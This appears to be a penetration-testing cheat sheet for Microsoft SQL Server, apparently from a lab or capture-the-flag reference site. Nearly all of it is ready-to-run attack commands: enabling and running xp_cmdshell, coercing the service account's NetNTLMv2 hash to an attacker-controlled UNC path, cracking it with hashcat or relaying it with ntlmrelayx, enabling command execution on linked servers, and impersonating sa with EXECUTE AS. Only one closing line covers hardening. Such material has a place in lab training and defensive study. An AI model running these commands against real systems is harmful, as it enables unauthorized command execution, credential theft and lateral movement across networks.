MSSQL
aka Microsoft SQL Server, SQL Server
Microsoft SQL Server on 1433. xp_cmdshell gives command execution, UNC tricks capture the service account's NetNTLM hash, and linked servers let you pivot across databases.
Ports
| Port | Proto | Notes |
|---|---|---|
1433 | tcp | MSSQL |
Fingerprint
- nmap ms-sql-info / ms-sql-ntlm-info
- Banner reveals the SQL Server version
Key files
| Path | Holds | Sensitive |
|---|---|---|
web.config / connection strings | sa or app DB credentials | sensitive |
Default / weak creds
sa / weak password; Windows-auth accounts
Service users
the SQL service account (often a domain account)
Exploitation primitives
- xp_cmdshell (enable via sp_configure) runs OS commands as the service account
- xp_dirtree / xp_fileexist to a UNC path captures NetNTLMv2 with Responder, then relay or crack
- Linked servers: EXECUTE AT / openquery to run on another instance, sometimes as sa
- EXECUTE AS LOGIN to impersonate higher-privileged logins
Overview
MSSQL on 1433 is a rich target on Windows: it can run OS commands, coerce authentication for hash capture, and chain across linked servers to reach instances you cannot touch directly.
Enumeration and exec
Connect with Windows auth:
impacket-mssqlclient dom/user:pass@<TARGET> -windows-authEnable command execution:
enable_xp_cmdshellRun a command:
xp_cmdshell whoamiCapture the service NetNTLM hash (with Responder running):
exec master..xp_dirtree '\\<YOUR_IP>\share'Linked servers
List linked servers and their remote login mapping:
enum_linksRun a query on a linked server (often as its sa):
EXEC ('select @@version; exec master..xp_cmdshell ''whoami''') AT [SQL02\INSTANCE]Enable xp_cmdshell on the remote instance through the link (RPC out):
EXEC ('sp_configure ''show advanced options'', 1; reconfigure; sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [SQL02\INSTANCE]Impersonation (EXECUTE AS)
Find logins you can impersonate:
SELECT name FROM sys.server_permissions p JOIN sys.server_principals l ON p.grantor_principal_id = l.principal_id WHERE permission_name = 'IMPERSONATE'Become a higher-privileged login, then act as sysadmin:
EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin')Capture / relay the service hash
Coerce auth to your box (run responder -I <iface> or ntlmrelayx first):
EXEC master..xp_subdirs '\\<YOUR_IP>\share\'Crack the captured NetNTLMv2 (hashcat mode 5600):
hashcat -m 5600 sqlsvc.hash /usr/share/wordlists/rockyou.txtOr relay it straight to another host instead of cracking:
ntlmrelayx.py -t smb://<OTHER_HOST> -smb2supportHardening
Keep xp_cmdshell disabled, run SQL as a low-priv account, and avoid linked servers with sysadmin mappings.
Seen on these machines 3
